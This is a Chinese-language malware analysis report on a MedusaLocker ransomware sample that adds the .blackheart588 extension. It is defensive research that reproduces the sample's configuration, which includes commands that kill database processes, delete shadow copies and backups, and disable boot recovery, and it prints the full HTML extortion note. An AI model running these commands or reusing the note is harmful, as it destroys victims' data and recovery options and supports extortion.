文章总结: 本文是对新版MEDUSALOCKER勒索病毒的深度分析,详细介绍了该勒索软件的背景、传播方式、加密机制和技术特征。MEDUSALOCKER通过RDP漏洞和钓鱼邮件传播,采用ChaCha20和RSA混合加密算法,对文件进行条状加密并添加.blackheart588后缀。该勒索软件会终止数据库和备份相关进程,删除卷影副本,并具备多线程加密功能。文章还分析了其勒索平台架构、加密器逆向分析和病毒特征,为防御和检测提供了技术参考。
综合评分: 85
文章分类: 恶意软件,勒索软件,漏洞分析,逆向分析,应急响应
【病毒分析】新版勒索病毒MEDUSA LOCKER 首发深度分析
原创
solarsec
solar应急响应团队
2025年9月17日 17:01
山东
#
1.背景
1.1 家族介绍
MEDUSA LOCKER 家族于 2019 年 9 月出现,MEDUSA LOCKER 家族通常通过有漏洞的远程桌面协议(RDP)配置获取受害者设备访问权限,攻击者还经常使用电子邮件钓鱼和垃圾邮件活动——直接将勒索软件附加到电子邮件中——作为初始入侵渠道。
MEDUSA LOCKER 对受害者的数据进行加密,并在包含加密文件的每个文件夹中留下带有勒索信。勒索信指示受害者向特定的比特币钱包地址提供勒索软件付款。MEDUSA LOCKER 似乎根据观察到的赎金支付拆分作为勒索软件即服务 (RaaS) 模型运行。典型的 RaaS 模型涉及勒索软件开发人员和在受害者系统上部署勒索软件的各种附属公司。MEDUSA LOCKER 家族付款似乎始终在附属公司之间分配,附属公司收到 55% 到 60% 的赎金;以及接收剩余部分的开发人员。
1.2 平台介绍
MEDUSA LOCKER家族提供两个tor地址:一个是博客,另一个是聊天室。博客中留有Tox联系方式,并会公开受害者的信息,点击特定受害者后,可以查看其详细的泄露数据和赎金要求;聊天室则要求输入ID和联系邮箱,且支持上传一个被加密的文件进行测试。提交后,系统将为受害者生成一个的聊天室,供其与MEDUSA LOCKER家族进行私密交流,其他人无法查看该对话内容。
1.2.1 博客页
博客首页
数据详情页
1.2.2 聊天室页
加载进入聊天室
成功创建聊天室
聊天室页面
2.恶意文件基础信息
2.1 恶意文件基本信息
| 文件名 | bh538.exe |
| — | — |
| 编译器 | Microsoft Visual C/C++(19.36.34810)[LTCG/C++] |
| 大小 | 1.72 MB |
| 操作系统 | Windows(Vista)[AMD64, 64位, Console] |
| 模式 | 64 位 |
| 类型 | PE64 |
| 字节序 | LE |
| MD5 | 7d64ffeb603fbe96a4b47982e2a1dd3f |
| SHA1 | f983c9e9216ad026edad6accb8962d90f8230019 |
| SHA256 | ca4dfe28e1f18a1b8e0bcd825abe129ab46031ba4faed8777bc95da67371d83d |
2.2 勒索信
3.加密后文件分析
3.1威胁分析
| 病毒家族 | MEDUSA LOCKER |
| — | — |
| 出现时间/捕获分析时间 | 2025/09/9 || 2025/09/11 |
| 威胁类型 | 勒索软件,加密病毒 |
| 加密文件扩展名 | .blackheart588 |
| 勒索信文件名 | read_to_decrypt_files.html |
| 有无免费解密器? | 无 |
| 联系邮箱 | [email protected] [email protected] |
| 感染症状 | 无法打开存储在计算机上的文件,以前功能的文件现在具有不同的扩展名(例如,solar.docx.blackheart588)。桌面上会显示一条勒索要求消息。网络犯罪分子要求支付赎金(通常以比特币)来解锁您的文件。 |
| 感染方式 | 受感染的电子邮件附件(宏)、恶意广告、漏洞利用、恶意链接 |
| 受灾影响 | 文件都经过加密,如果不支付赎金就无法打开。其他密码窃取木马和恶意软件感染可以与勒索软件感染一起安装。 |
3.2 加密的测试文件
文件名
sierting.txt
具体内容:
加密文件名特征:
加密文件名 = 原始文件名+blackheart588 ,例如:sierting.txt.blackheart588
加密文件数据特征:
对于文件的加密根据如下配置,条状加密,其中每一条都为1136023字节,当加密字节累计超过3853566字节后就不再加密。
"bytesCryptAndSkip": 1136023,
"bytesForEncrypt": 3853566,
加密算法:
chacha密钥生成:
KEY:
使用如下函数生成随机的key
RSA密钥生成:
公私钥对:
生成公私钥对
程序执行流程:
4.逆向分析
4.1加密器逆向分析
4.1.1main函数
创建多个线程
执行如下命令
"rem Kill \"SQL\"",
"taskkill -f -im sqlbrowser.exe",
"taskkill -f -im sql writer.exe",
"taskkill -f -im sqlserv.exe",
"taskkill -f -im msmdsrv.exe",
"taskkill -f -im MsDtsSrvr.exe",
"taskkill -f -im sqlceip.exe",
"taskkill -f -im fdlauncher.exe",
"taskkill -f -im Ssms.exe",
"taskkill -f -im SQLAGENT.EXE",
"taskkill -f -im fdhost.exe",
"taskkill -f -im ReportingServicesService.exe",
"taskkill -f -im msftesql.exe",
"taskkill -f -im pg_ctl.exe",
"taskkill -f -impostgres.exe",
"net stop MSSQLServerADHelper100",
"net stop MSSQL$ISARS",
"net stop MSSQL$MSFW",
"net stop SQLAgent$ISARS",
"net stop SQLAgent$MSFW",
"net stop SQLBrowser",
"net stop REportServer$ISARS",
"net stop SQLWriter",
"vssadmin.exe Delete Shadows /All /Quiet",
"wbadmin delete backup -keepVersion:0 -quiet",
"wbadmin DELETE SYSTEMSTATEBACKUP",
"wbadmin DELETE SYSTEMSTABACKUP -deleteOldest",
"wmic.exe SHADOWCOPY /nointeractive",
"bcdedit.exe /set {default} recoverynabled No",
"bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"
检测输入的参数,如果是-h提供帮助信息
4.1.2ui_status_thread函数
显示加密进度窗口
4.1.3add_to_startup函数
权限维持函数,添加自启动
4.1.4clear_recycle_bin函数
清空回收站
4.1.5set_background_image函数
更换壁纸,由于该勒索的配置中启用该功能,因为不会更换壁纸
4.1.6file_scan_thread函数
给扫描到的每个驱动器都分配线程执行目录扫描和加密任务
4.1.7scan_directory_and_encrypt函数
判断路径是否位于排除目录中,排除的目录路径如下:
"C:\\perflogs",
"C:\\Intel",
"C:\\HP",
"C:\\AMD",
"C:\\Dell",
"C:\\Drivers",
"C:\\inetpub",
"B:\\Boot",
"A:\\Boot",
"B:\\EFI",
"A:\\EFI",
"C:\\ProgramData\\Anydesk",
":\\Boot"
如果扫描到的是目录就递归扫描
判断后缀是否为黑名单,如果不是则进入加密,黑名单后缀如下:
".dll",
".sys",
".readtext*",
".readtext95"
如果没有配置信息的话加密后缀为crypt,但是当前程序的配置信息如下,因此加密后缀为.blackheart588
{
"backgroundImage": false,
"backgroundImageData": "",
"bytesCryptAndSkip": 1136023,
"bytesForEncrypt": 3853566,
"chiperDrives": true,
"encryptedFileExtension": ".blackheart588",
"hideConsole": false,
"masterPublicKey": "BgIAAACkAABSU0ExAAgAAAEAAQARdxsz/cuLEbEvHU8So1S/Gy+W8lMxU402zgeRJYdmOl27aMCNQuH6OdDOIe7uMU7IJcxoPPadwV3yZyL4Hzn+ywknxMurdAbWwX91z3OGGDwhvA3bO2NcU4Yc7uOCnRRjvGapShKe4JlF+OjFdOrOvc+80Yc6v27HBQdHwpRVW12AKm7x9uwdjBre9PgQ5UgqYIaPbtlqx5fKwja713PELH34IZ1gc8XIvZymkTVIgx8XVSTwPBkCuLtD61Qvmwy/NYxAcsNghdv+YuLMcW85RA/wRlY6h8PeExHfdLwt/ZVFV3hJ20lwMDF1l6DSHVCJIVyxQUozjD2uRl3agu6l\u0000",
"openRequirementsOnFinish": false,
"postRunCommands": [],
"preRunCommands": [
"rem Kill \"SQL\"",
"taskkill -f -im sqlbrowser.exe",
"taskkill -f -im sql writer.exe",
"taskkill -f -im sqlserv.exe",
"taskkill -f -im msmdsrv.exe",
"taskkill -f -im MsDtsSrvr.exe",
"taskkill -f -im sqlceip.exe",
"taskkill -f -im fdlauncher.exe",
"taskkill -f -im Ssms.exe",
"taskkill -f -im SQLAGENT.EXE",
"taskkill -f -im fdhost.exe",
"taskkill -f -im ReportingServicesService.exe",
"taskkill -f -im msftesql.exe",
"taskkill -f -im pg_ctl.exe",
"taskkill -f -impostgres.exe",
"net stop MSSQLServerADHelper100",
"net stop MSSQL$ISARS",
"net stop MSSQL$MSFW",
"net stop SQLAgent$ISARS",
"net stop SQLAgent$MSFW",
"net stop SQLBrowser",
"net stop REportServer$ISARS",
"net stop SQLWriter",
"vssadmin.exe Delete Shadows /All /Quiet",
"wbadmin delete backup -keepVersion:0 -quiet",
"wbadmin DELETE SYSTEMSTATEBACKUP",
"wbadmin DELETE SYSTEMSTABACKUP -deleteOldest",
"wmic.exe SHADOWCOPY /nointeractive",
"bcdedit.exe /set {default} recoverynabled No",
"bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"
],
"regenerateKeysAlways": false,
"removeRecycle": true,
"requirementsFileDataUTF8": "<!DOCTYPE html>\n<html lang=\"en\">\n<head>\n <meta charset=\"UTF-8\">\n <meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\">\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n <title>Network Security Notification & Regulatory Report</title>\n <link href=\"https://fonts.googleapis.com/css?family=Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\" rel=\"stylesheet\">\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css\">\n <style>\n /* Base styles */\n * {\n margin: 0;\n padding: 0;\n box-sizing: border-box;\n font-family: 'Montserrat', sans-serif;\n }\n \n body {\n background: linear-gradient(135deg, #0a0c14 0%, #191c25 100%);\n color: #e0e0e0;\n min-height: 100vh;\n line-height: 1.6;\n overflow-x: hidden;\n position: relative;\n }\n \n /* Background pattern */\n .background {\n position: fixed;\n inset: 0;\n background: \n radial-gradient(circle at 10% 20%, rgba(220, 53, 70, 0.1) 0%, transparent 15%),\n radial-gradient(circle at 90% 80%, rgba(220, 53, 70, 0.1) 0%, transparent 15%),\n repeating-linear-gradient(45deg, rgba(25, 28, 37, 0.8) 0px, rgba(25, 28, 37, 0.8) 2px, transparent 2px, transparent 4px);\n opacity: 0.6;\n z-index: -1;\n }\n \n /* Container for content */\n .container {\n max-width: 1200px;\n margin: 0 auto;\n padding: 20px;\n }\n \n /* Notification header */\n .notification-header {\n text-align: center;\n padding: 30px 0;\n position: relative;\n margin-bottom: 20px;\n }\n \n .notification-header h1 {\n font-size: 2.5rem;\n margin-bottom: 15px;\n background: linear-gradient(to right, #ff4d61, #dc3546);\n -webkit-background-clip: text;\n -webkit-text-fill-color: transparent;\n text-shadow: 0 2px 10px rgba(220, 53, 70, 0.3);\n }\n \n .identifier {\n display: inline-block;\n font-size: 1.2rem;\n word-break: break-all;\n background: rgba(220, 53, 70, 0.2);\n padding: 15px 25px;\n border-radius: 8px;\n margin-top: 15px;\n border: 1px solid #dc3546;\n font-weight: 600;\n letter-spacing: 1px;\n }\n \n /* Main notification content */\n .notification-content {\n background: rgba(23, 23, 25, 0.9);\n border-radius: 12px;\n overflow: hidden;\n box-shadow: 0 15px 40px rgba(0, 0, 0, 0.6);\n margin-bottom: 50px;\n backdrop-filter: blur(5px);\n border: 1px solid rgba(255, 255, 255, 0.05);\n }\n \n .notification-banner {\n padding: 40px 20px;\n text-align: center;\n background: linear-gradient(90deg, #dc3546, #a71e2d);\n position: relative;\n overflow: hidden;\n }\n \n .notification-banner::before {\n content: \"\";\n position: absolute;\n top: 0;\n left: 0;\n right: 0;\n height: 5px;\n background: linear-gradient(90deg, transparent, #fff, transparent);\n }\n \n .notification-banner h2 {\n font-size: 2rem;\n line-height: 1.4;\n margin-bottom: 15px;\n text-shadow: 0 2px 4px rgba(0, 0, 0, 0.4);\n }\n \n .highlight {\n background: rgba(0, 0, 0, 0.3);\n padding: 8px 20px;\n border-radius: 30px;\n display: inline-block;\n margin-top: 15px;\n font-weight: 700;\n font-size: 1.8rem;\n letter-spacing: 1px;\n border: 2px solid rgba(255, 255, 255, 0.2);\n }\n \n .notification-body {\n padding: 40px;\n display: grid;\n gap: 30px;\n }\n \n .text-center {\n text-align: center;\n }\n \n .warning-box {\n background: rgba(36, 37, 41, 0.8);\n padding: 25px;\n border-radius: 8px;\n border-left: 5px solid #dc3546;\n box-shadow: 0 5px 15px rgba(0, 0, 0, 0.3);\n }\n \n .warning-box b {\n color: #ff4d61;\n font-size: 1.1rem;\n }\n \n p {\n margin: 15px 0;\n font-size: 1.05rem;\n line-height: 1.7;\n }\n \n a {\n color: #ff4d61;\n text-decoration: none;\n transition: all 0.3s;\n word-break: break-all;\n font-weight: 500;\n }\n \n a:hover {\n color: white;\n text-decoration: underline;\n }\n \n .contact-container {\n display: flex;\n flex-wrap: wrap;\n gap: 20px;\n align-items: flex-start;\n margin: 20px 0;\n }\n \n .contact-container > div {\n flex: 1;\n min-width: 250px;\n }\n \n .urgent-alert {\n color: #ff4d61;\n font-weight: 700;\n text-align: center;\n padding: 20px;\n background: rgba(220, 53, 70, 0.15);\n border-radius: 8px;\n margin: 30px 0;\n border: 2px solid #dc3546;\n animation: pulse 2s infinite;\n font-size: 1.2rem;\n }\n \n .contact-info {\n margin: 25px 0;\n padding: 15px;\n background: rgba(36, 37, 41, 0.5);\n border-radius: 8px;\n }\n \n .tox-id {\n font-family: monospace;\n font-size: 0.95rem;\n word-break: break-all;\n background: rgba(255, 255, 255, 0.05);\n padding: 12px;\n border-radius: 6px;\n margin-top: 8px;\n border: 1px solid rgba(255, 255, 255, 0.1);\n }\n \n @keyframes pulse {\n 0% { box-shadow: 0 0 0 0 rgba(220, 53, 70, 0.4); }\n 70% { box-shadow: 0 0 0 15px rgba(220, 53, 70, 0); }\n 100% { box-shadow: 0 0 0 0 rgba(220, 53, 70, 0); }\n }\n \n /* Report section divider */\n .report-divider {\n text-align: center;\n margin: 60px 0 40px;\n position: relative;\n }\n \n .report-divider h2 {\n display: inline-block;\n background: linear-gradient(90deg, #dc3546, #8b0000);\n padding: 18px 50px;\n border-radius: 50px;\n font-size: 1.8rem;\n position: relative;\n z-index: 2;\n box-shadow: 0 5px 20px rgba(220, 53, 70, 0.4);\n }\n \n .report-divider::before {\n content: \"\";\n position: absolute;\n top: 50%;\n left: 0;\n right: 0;\n height: 3px;\n background: linear-gradient(90deg, transparent, #dc3546, transparent);\n z-index: 1;\n }\n \n /* Report content styles */\n .report-content {\n background: rgba(23, 23, 25, 0.9);\n color: #e0e0e0;\n border-radius: 12px;\n box-shadow: 0 15px 40px rgba(0, 0, 0, 0.6);\n padding: 40px;\n margin-bottom: 50px;\n backdrop-filter: blur(5px);\n border: 1px solid rgba(255, 255, 255, 0.05);\n }\n \n .report-content h1 {\n color: #ff4d61;\n text-align: center;\n border-bottom: 3px solid #dc3546;\n padding-bottom: 15px;\n margin-bottom: 40px;\n font-size: 2.3rem;\n text-shadow: 0 2px 4px rgba(0, 0, 0, 0.4);\n }\n \n .report-content h2 {\n color: #ff4d61;\n border-left: 5px solid #3498db;\n padding-left: 20px;\n margin-top: 40px;\n font-size: 1.7rem;\n }\n \n .report-content h3 {\n color: #ff4d61;\n margin-top: 30px;\n font-size: 1.4rem;\n }\n \n .region-section {\n margin-bottom: 40px;\n padding: 25px;\n background: rgba(36, 37, 41, 0.5);\n border-radius: 10px;\n border-left: 5px solid #3498db;\n box-shadow: 0 5px 15px rgba(0, 0, 0, 0.3);\n }\n \n .eu-section {\n border-left-color: #3498db;\n }\n \n .usa-section {\n border-left-color: #e74c3c;\n }\n \n .asia-section {\n border-left-color: #f39c12;\n }\n \n .report-content table {\n width: 100%;\n border-collapse: collapse;\n margin: 25px 0;\n background: rgba(36, 37, 41, 0.7);\n box-shadow: 0 5px 15px rgba(0, 0, 0, 0.3);\n border-radius: 8px;\n overflow: hidden;\n }\n \n .report-content th, .report-content td {\n border: 1px solid rgba(68, 68, 68, 0.5);\n padding: 15px;\n text-align: left;\n }\n \n .report-content th {\n background-color: #dc3546;\n color: white;\n font-weight: bold;\n font-size: 1.1rem;\n }\n \n .report-content tr:nth-child(even) {\n background-color: rgba(255, 255, 255, 0.03);\n }\n \n .report-content tr:hover {\n background-color: rgba(220, 53, 70, 0.1);\n }\n \n .report-content .highlight {\n background-color: rgba(255, 193, 7, 0.1);\n padding: 20px;\n border-left: 4px solid #ffc107;\n margin: 25px 0;\n border-radius: 8px;\n }\n \n .report-content .fine-amount {\n font-weight: bold;\n color: #ff4d61;\n }\n \n .report-content .case-study {\n background: rgba(39, 174, 96, 0.1);\n padding: 20px;\n margin: 20px 0;\n border-radius: 8px;\n border-left: 4px solid #27ae60;\n }\n \n .report-content .key-stats {\n display: grid;\n grid-template-columns: repeat(auto-fit, minmax(250px, 1fr));\n gap: 25px;\n margin: 40px 0;\n }\n \n .report-content .stat-card {\n background: linear-gradient(135deg, #dc3546 0%, #8b0000 100%);\n color: white;\n padding: 25px;\n border-radius: 12px;\n text-align: center;\n box-shadow: 0 8px 20px rgba(0, 0, 0, 0.4);\n transition: transform 0.3s;\n }\n \n .report-content .stat-card:hover {\n transform: translateY(-5px);\n }\n \n .report-content .stat-number {\n font-size: 2.5rem;\n font-weight: bold;\n display: block;\n margin-bottom: 10px;\n text-shadow: 0 2px 4px rgba(0, 0, 0, 0.4);\n }\n \n .report-content .references {\n background: rgba(255, 255, 255, 0.05);\n padding: 25px;\n margin-top: 50px;\n border-radius: 10px;\n font-size: 0.95rem;\n }\n \n .report-content .references h3 {\n color: #ff4d61;\n margin-bottom: 20px;\n text-align: center;\n }\n \n .report-content .summary-section {\n background: rgba(255, 193, 7, 0.1);\n padding: 30px;\n margin: 40px 0;\n border-radius: 12px;\n border: 2px solid #ffc107;\n }\n \n .report-content ul {\n padding-left: 30px;\n margin: 20px 0;\n }\n \n .report-content li {\n margin-bottom: 12px;\n line-height: 1.7;\n }\n \n /* Footer */\n .footer {\n text-align: center;\n padding: 30px;\n color: #aaa;\n font-size: 0.9rem;\n border-top: 1px solid rgba(255, 255, 255, 0.1);\n margin-top: 50px;\n }\n \n /* Scroll to top button */\n .scroll-top {\n position: fixed;\n bottom: 30px;\n right: 30px;\n background: #dc3546;\n color: white;\n width: 60px;\n height: 60px;\n border-radius: 50%;\n display: flex;\n align-items: center;\n justify-content: center;\n cursor: pointer;\n opacity: 0.8;\n transition: all 0.3s;\n z-index: 1000;\n box-shadow: 0 5px 15px rgba(220, 53, 70, 0.4);\n font-size: 1.5rem;\n }\n \n .scroll-top:hover {\n opacity: 1;\n transform: translateY(-5px);\n }\n \n /* Responsive design */\n @media (max-width: 768px) {\n .container {\n padding: 15px;\n }\n \n .notification-header h1 {\n font-size: 1.8rem;\n }\n \n .notification-banner h2 {\n font-size: 1.5rem;\n }\n \n .highlight {\n font-size: 1.4rem;\n }\n \n .notification-body, .report-content {\n padding: 25px;\n }\n \n .report-content h1 {\n font-size: 1.8rem;\n }\n \n .report-content h2 {\n font-size: 1.4rem;\n }\n \n .report-divider h2 {\n font-size: 1.4rem;\n padding: 12px 30px;\n }\n \n .report-content .key-stats {\n grid-template-columns: 1fr;\n }\n \n .contact-container {\n flex-direction: column;\n }\n \n .scroll-top {\n width: 50px;\n height: 50px;\n font-size: 1.2rem;\n }\n }\n \n @media (max-width: 480px) {\n .notification-header h1 {\n font-size: 1.6rem;\n }\n \n .notification-banner h2 {\n font-size: 1.3rem;\n }\n \n .identifier {\n font-size: 1rem;\n padding: 12px 20px;\n }\n \n .report-content {\n padding: 20px;\n }\n \n .report-content table {\n font-size: 0.85rem;\n }\n \n .report-content th, .report-content td {\n padding: 10px;\n }\n }\n </style>\n</head>\n<body>\n <div class=\"background\"></div>\n \n <div class=\"container\">\n <!-- Ransomware Notification Section -->\n <div class=\"notification-header\">\n <h1>NETWORK SECURITY NOTIFICATION</h1>\n <div class=\"identifier\">YOUR PERSONAL ID: [IDENTIFIER]</div>\n </div>\n \n <div class=\"notification-content\">\n <div class=\"notification-banner\">\n <h2>\n YOUR CORPORATE NETWORK HAS BEEN\n </h2>\n <div class=\"highlight\">COMPROMISED & ENCRYPTED</div>\n </div>\n \n <div class=\"notification-body\">\n <h3 class=\"text-center\">\n <i class=\"fas fa-lock\"></i> Your files are secured with military-grade encryption (RSA-4096 + AES-256)\n </h3>\n \n <div class=\"warning-box\">\n <b>\n <i class=\"fas fa-exclamation-triangle\"></i> WARNING: ANY ATTEMPT TO RESTORE FILES WITH THIRD-PARTY SOFTWARE WILL CAUSE PERMANENT DATA CORRUPTION. DO NOT MODIFY OR RENAME ENCRYPTED FILES.\n </b>\n </div>\n \n <p>\n We have successfully infiltrated your network and encrypted critical data. All compromised information including confidential documents, financial records, and personal data is securely stored on our private servers. This server will be permanently destroyed upon confirmation of your payment. Failure to comply will result in public release of all data to media outlets and data brokers.\n </p>\n \n <p>\n We operate purely for financial gain, not to damage your operations. To verify our capability, we offer free decryption of 2–3 non-critical files as proof of our solution.\n </p>\n \n <h3 class=\"text-center\">Contact us immediately for pricing and decryption software</h3>\n \n <div class=\"warning-box\">\n <div class=\"contact-container\">\n <p><b><i class=\"fas fa-envelope\"></i> EMAIL:</b></p>\n <div class=\"contact-info\">\n <p><a href=\"mailto:[email protected]\"><i class=\"fas fa-at\"></i> [email protected]</a></p>\n <p><a href=\"mailto:[email protected]\"><i class=\"fas fa-at\"></i> [email protected]</a></p>\n </div>\n </div>\n \n <p class=\"text-center\">\n <i class=\"fas fa-shield-alt\"></i> For secure communication, create a new account at: \n <a href=\"https://protonmail.com\" target=\"_blank\">protonmail.com</a>\n </p>\n \n <div class=\"urgent-alert\">\n <i class=\"fas fa-clock\"></i> CONTACT US WITHIN 72 HOURS TO PREVENT PRICE INCREASE\n </div>\n \n <div class=\"contact-info\">\n <p><i class=\"fas fa-user-secret\"></i> TOR CHAT (24/7 SUPPORT):</p>\n <a href=\"http://qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion\">\n http://qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion\n </a>\n </div>\n \n <div class=\"contact-info\">\n <p><i class=\"fas fa-comment-dots\"></i> qTox ID:</p>\n <div class=\"tox-id\">7C564920870C0D33535D2012ECDDE389FE25BAF7AF427DD584EE39C04AF8CF024F8BFA93D8DB</div>\n </div>\n </div>\n </div>\n </div>\n \n <!-- Report Section Divider -->\n <div class=\"report-divider\">\n <h2><i class=\"fas fa-file-contract\"></i> DATA BREACH REGULATORY CONSEQUENCES REPORT</h2>\n </div>\n \n <!-- Regulatory Consequences Report -->\n <div class=\"report-content\">\n <h1>Global Data Breach Regulatory Liability Analysis</h1>\n \n <div class=\"key-stats\">\n <div class=\"stat-card\">\n <span class=\"stat-number\">€20M</span>\n <div>Maximum EU GDPR Fine</div>\n </div>\n <div class=\"stat-card\">\n <span class=\"stat-number\">$4.88M</span>\n <div>Average Breach Cost (2024)</div>\n </div>\n <div class=\"stat-card\">\n <span class=\"stat-number\">277</span>\n <div>Days Recovery Time</div>\n </div>\n <div class=\"stat-card\">\n <span class=\"stat-number\">65%</span>\n <div>Customer Attrition Rate</div>\n </div>\n </div>\n\n <div class=\"region-section eu-section\">\n <h2>European Union Regulations</h2>\n \n <div class=\"highlight\">\n <strong>Primary Regulation:</strong> General Data Protection Regulation (GDPR) – Regulation (EU) 2016/679\n </div>\n \n <h3>Key Requirements</h3>\n <ul>\n <li><strong>Articles 33–34:</strong> Mandatory 72-hour breach notification to authorities</li>\n <li><strong>Article 83:</strong> Fines up to <span class=\"fine-amount\">€20 million or 4% of global annual revenue</span> (whichever is higher)</li>\n <li><strong>Article 82:</strong> Right to compensation for damages</li>\n </ul>\n \n <h3>Notable Enforcement Actions</h3>\n <div class=\"case-study\">\n <strong>Meta (Facebook):</strong> <span class=\"fine-amount\">€1.2 billion</span> (2023) – Data transfers violation<br>\n <strong>Amazon:</strong> <span class=\"fine-amount\">€746 million</span> (2021) – Inadequate consent mechanisms<br>\n <strong>British Airways:</strong> <span class=\"fine-amount\">€229 million</span> – 500,000 customer records compromised\n </div>\n \n <p><strong>Average Cost of Breach:</strong> <span class=\"fine-amount\">€4.67 million</span> (IBM Security 2024 Report)</p>\n </div>\n\n <div class=\"region-section usa-section\">\n <h2>United States Regulations</h2>\n \n <h3>Federal Compliance Frameworks</h3>\n \n <h4>Health Insurance Portability and Accountability Act (HIPAA)</h4>\n <ul>\n <li><strong>Civil penalties:</strong> $141 – <span class=\"fine-amount\">$2,134,831</span> per violation</li>\n <li><strong>Criminal penalties:</strong> Up to 10 years imprisonment + $250,000 fines</li>\n </ul>\n \n <h4>California Consumer Privacy Act (CCPA/CPRA)</h4>\n <ul>\n <li><strong>Regulatory fines:</strong> $2,500–$7,500 per violation</li>\n <li><strong>Private actions:</strong> $100–$750 per affected California resident</li>\n </ul>\n \n <h3>Major Settlements</h3>\n <div class=\"case-study\">\n <strong>Equifax:</strong> <span class=\"fine-amount\">$575 million</span> – 147 million consumers impacted<br>\n <strong>Facebook/Meta:</strong> <span class=\"fine-amount\">$5 billion</span> – FTC privacy violation penalty<br>\n <strong>Anthem Inc:</strong> <span class=\"fine-amount\">$115 million</span> – 79 million medical records breached\n </div>\n \n <h3>Sector-Specific Impacts</h3>\n <ul>\n <li><strong>Healthcare:</strong> <span class=\"fine-amount\">$10.93 million</span> average breach cost</li>\n <li><strong>Financial Services:</strong> <span class=\"fine-amount\">$5.9 million</span> average breach cost</li>\n <li><strong>Critical Infrastructure:</strong> Mandatory reporting within 72 hours (CIRCIA 2022)</li>\n </ul>\n </div>\n\n <div class=\"region-section asia-section\">\n <h2>Asia-Pacific Regulations</h2>\n \n <table>\n <thead>\n <tr>\n <th>Jurisdiction</th>\n <th>Governing Law</th>\n <th>Maximum Fine</th>\n <th>Criminal Liability</th>\n </tr>\n </thead>\n <tbody>\n <tr>\n <td><strong>South Korea</strong></td>\n <td>Personal Information Protection Act (PIPA)</td>\n <td><span class=\"fine-amount\">₩30M + 3% revenue</span></td>\n <td>6 months imprisonment</td>\n </tr>\n <tr>\n <td><strong>Singapore</strong></td>\n <td>Personal Data Protection Act (PDPA)</td>\n <td><span class=\"fine-amount\">S$1M or 10% revenue</span></td>\n <td>2 years imprisonment</td>\n </tr>\n <tr>\n <td><strong>Japan</strong></td>\n <td>Act on Protection of Personal Information (APPI)</td>\n <td><span class=\"fine-amount\">¥100 million</span></td>\n <td>1 year imprisonment</td>\n </tr>\n <tr>\n <td><strong>Thailand</strong></td>\n <td>Personal Data Protection Act (PDPA)</td>\n <td><span class=\"fine-amount\">฿7 million</span></td>\n <td>Administrative sanctions</td>\n </tr>\n </tbody>\n </table>\n \n <h3>Notable Cases</h3>\n <div class=\"case-study\">\n <strong>SK Telecom (South Korea):</strong> <span class=\"fine-amount\">₩643 billion market cap loss</span> – 26.96 million records<br>\n <strong>Singapore IHiS:</strong> <span class=\"fine-amount\">S$750,000 fine</span> – 1.5 million patient records<br>\n <strong>Thai Company:</strong> <span class=\"fine-amount\">฿7 million</span> – First PDPA violation fine\n </div>\n </div>\n\n <div class=\"summary-section\">\n <h2>Global Regulatory Penalty Comparison</h2>\n \n <table>\n <thead>\n <tr>\n <th>Region/Jurisdiction</th>\n <th>Maximum Financial Penalty</th>\n <th>Criminal Liability</th>\n </tr>\n </thead>\n <tbody>\n <tr>\n <td><strong>European Union (GDPR)</strong></td>\n <td><span class=\"fine-amount\">€20M or 4% global revenue</span></td>\n <td>Member state determination</td>\n </tr>\n <tr>\n <td><strong>USA Federal (HIPAA)</strong></td>\n <td><span class=\"fine-amount\">$2.13M per violation</span></td>\n <td>10 years imprisonment</td>\n </tr>\n <tr>\n <td><strong>California (CCPA)</strong></td>\n <td><span class=\"fine-amount\">$7,500 per violation</span></td>\n <td>Not applicable</td>\n </tr>\n <tr>\n <td><strong>South Korea (PIPA)</strong></td>\n <td><span class=\"fine-amount\">₩30M + 3% revenue</span></td>\n <td>6 months imprisonment</td>\n </tr>\n <tr>\n <td><strong>Singapore (PDPA)</strong></td>\n <td><span class=\"fine-amount\">S$1M or 10% revenue</span></td>\n <td>2 years imprisonment</td>\n </tr>\n </tbody>\n </table>\n </div>\n\n <div class=\"region-section\">\n <h2>Business Impact Analysis</h2>\n \n <ul>\n <li><strong>Financial:</strong> Average breach cost increased to <span class=\"fine-amount\">$4.88 million</span> in 2024 (12% YoY growth)</li>\n <li><strong>Reputational:</strong> <span class=\"fine-amount\">65% of consumers</span> discontinue relationships with breached organizations</li>\n <li><strong>Operational:</strong> Mean business disruption period of <span class=\"fine-amount\">277 days</span></li>\n <li><strong>Regulatory:</strong> 157% increase in global data protection regulations since 2018</li>\n </ul>\n \n <h3>Business Continuity Risks</h3>\n <div class=\"case-study\">\n <strong>National Public Data:</strong> Bankruptcy following breach of 2.7 billion records<br>\n <strong>23andMe:</strong> Bankruptcy proceedings after 6.9 million genetic profiles exposed<br>\n <strong>Retail Chain:</strong> 42% revenue decline post-breach (Forrester Research)\n </div>\n \n <div class=\"highlight\">\n <strong>Conclusion:</strong> Data breaches represent existential threats to organizational viability through regulatory penalties, litigation exposure, customer attrition, and operational disruption. Proactive resolution minimizes financial and reputational damage.\n </div>\n </div>\n\n <div class=\"references\">\n <h3>Reference Documentation</h3>\n <p><em>This analysis incorporates statutory requirements, enforcement actions, and cost data from: EU GDPR (2016/679), US HIPAA, CCPA/CPRA, PDPA (Singapore), APPI (Japan), PIPA (South Korea), IBM Security Cost of Data Breach Report (2024), Forrester Research, Gartner, and regulatory enforcement databases.</em></p>\n </div>\n </div>\n </div>\n \n <!-- Footer -->\n <div class=\"footer\">\n <p>This communication is confidential and intended solely for the recipient. Unauthorized use prohibited.</p>\n <p>© 2024 Network Security Operations</p>\n </div>\n \n <!-- Scroll to top button -->\n <div class=\"scroll-top\" onclick=\"window.scrollTo({top: 0, behavior: 'smooth'})\">\n <i class=\"fas fa-arrow-up\"></i>\n </div>\n \n <script>\n // Show/hide scroll to top button\n window.addEventListener('scroll', function() {\n const scrollButton = document.querySelector('.scroll-top');\n if (window.scrollY > 500) {\n scrollButton.style.display = 'flex';\n } else {\n scrollButton.style.display = 'none';\n }\n });\n \n 